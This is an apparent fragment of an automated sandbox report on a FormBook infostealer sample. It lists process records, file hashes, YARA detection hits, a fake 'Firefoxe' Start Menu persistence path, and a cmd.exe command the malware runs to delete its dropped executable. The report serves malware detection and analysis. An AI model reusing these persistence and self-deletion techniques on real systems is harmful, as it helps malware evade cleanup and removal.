                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:.Net C# or VB.NET

                                                                                                                                                            Analysis Process: NAPSTAT.EXE PID: 2016 Parent PID: 1388

                                                                                                                                                            General

                                                                                                                                                            Start time:08:44:30
                                                                                                                                                            Start date:26/11/2020
                                                                                                                                                            Path:C:\Windows\SysWOW64\NAPSTAT.EXE
                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                            Commandline:C:\Windows\SysWOW64\NAPSTAT.EXE
                                                                                                                                                            Imagebase:0xcd0000
                                                                                                                                                            File size:279552 bytes
                                                                                                                                                            MD5 hash:4AF92E1821D96E4178732FC04D8FD69C
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                            Yara matches:
                                                                                                                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000C.00000002.2389941869.0000000000330000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000C.00000002.2389941869.0000000000330000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000C.00000002.2389941869.0000000000330000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000C.00000002.2389745948.0000000000120000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000C.00000002.2389745948.0000000000120000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000C.00000002.2389745948.0000000000120000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000C.00000002.2389888753.0000000000280000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000C.00000002.2389888753.0000000000280000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000C.00000002.2389888753.0000000000280000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group

                                                                                                                                                            Analysis Process: cmd.exe PID: 172 Parent PID: 2016

                                                                                                                                                            General

                                                                                                                                                            Start time:08:44:35
                                                                                                                                                            Start date:26/11/2020
                                                                                                                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                            Commandline:/c del 'C:\Users\user\AppData\Roaming\skypound83892.exe'
                                                                                                                                                            Imagebase:0x4a770000
                                                                                                                                                            File size:302592 bytes
                                                                                                                                                            MD5 hash:AD7B9C14083B52BC532FBA5948342B98
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:C, C++ or other language

                                                                                                                                                            Analysis Process: firefos.exe PID: 2336 Parent PID: 2992

                                                                                                                                                            General

                                                                                                                                                            Start time:08:44:47
                                                                                                                                                            Start date:26/11/2020
                                                                                                                                                            Path:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exe
                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                            Commandline:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exe
                                                                                                                                                            Imagebase:0xcd0000
                                                                                                                                                            File size:278528 bytes
                                                                                                                                                            MD5 hash:EF8FC92D8B47C1F40DD5233AA9B3F260
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                            Yara matches:
                                                                                                                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000F.00000002.2233553109.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000F.00000002.2233553109.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000F.00000002.2233553109.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group

                                                                                                                                                            Analysis Process: firefos.exe PID: 2840 Parent PID: 2872

                                                                                                                                                            General

                                                                                                                                                            Start time:08:45:19
                                                                                                                                                            Start date:26/11/2020
                                                                                                                                                            Path:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exe
                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                            Commandline:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exe
                                                                                                                                                            Imagebase:0xcd0000
                                                                                                                                                            File size:278528 bytes
                                                                                                                                                            MD5 hash:EF8FC92D8B47C1F40DD5233AA9B3F260
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                            Yara matches:
                                                                                                                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000010.00000002.2299563843.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000010.00000002.2299563843.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000010.00000002.2299563843.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group

                                                                                                                                                            Disassembly

                                                                                                                                                            Code Analysis

                                                                                                                                                            Reset < >